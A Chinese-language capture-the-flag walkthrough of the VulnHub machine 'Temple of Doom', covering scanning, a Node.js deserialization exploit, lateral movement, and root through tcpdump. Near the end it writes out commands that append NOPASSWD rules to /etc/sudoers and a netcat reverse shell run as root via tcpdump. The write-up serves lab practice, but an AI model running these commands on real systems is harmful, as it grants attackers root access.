本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/
sudo nmap -n -p- -A -sC -sV -oN templeofdoom 192.168.202.5
nmap扫描结果
开放了两个端口22和666,看来只能使用666端口了,扫描出来的结果是nodejs的httpweb服务,我们先访问看看
目标爆破看看
没扫出来啥东西,看抓包看看
发现这类型东西,上面的请求cookie头信息属性值像是base64编码,看是不是可以使用base64解码
发现是可以解码的,到了这一步实在找不到利用点,回想刚开始使用nmap扫描出来的信息是使用nodejs框架,那么谷歌下对于框架的exploit,发现这个:https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
此靶机还真的可以使用notejs框架的反序列化命令执行漏洞,根据找到的exp参考信息测试下面命令执行的效果:
获取当前应用的用户名
成功使用nc反弹了shell,到家目录喵喵,按照常规套路也是这么玩的
发现另一个用户fireman,但是没有权限进入,此时的目标方向是想办法切换到此用户下,使用ps aux命令过滤用户fireman相关的进程,发现有个服务xx跟其相关,如果能通过此进程做跳板,那么就可以切换至用户fireman,谷歌了下,发现xx存在远程命令执行,那这就好办了,直接本地利用看看(这里带了敏感关键词,我清理掉了才能发出去)
成功反弹shell,执行下sudo -l 发现可以通过tcpdump提权了,这个前面靶机也有讲到过了
提权的命令如下:
追加用户提权的前提是知道追加的这个用户的密码的情况下可以通过此方式提权 echo 'echo "%fireman ALL=(ALL:ALL) ALL" >> /etc/sudoers' > /tmp/.bmfx 或者
echo 'echo "bmfx ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers' > privesc.sh 这个不需要知道密码
echo 'echo "bmfx ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh 这个不需要知道密码
或者使用下面的nc反弹 echo "nc -e /bin/bash 192.168.202.6 8866" > /tmp/.bmfx chmod +x /tmp/.bmfx sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.bmfx -Z root
由于我误操作把本机的kali和靶机都删除了,导致重新配置环境,所以IP地址变了,最终提权的结果如下:
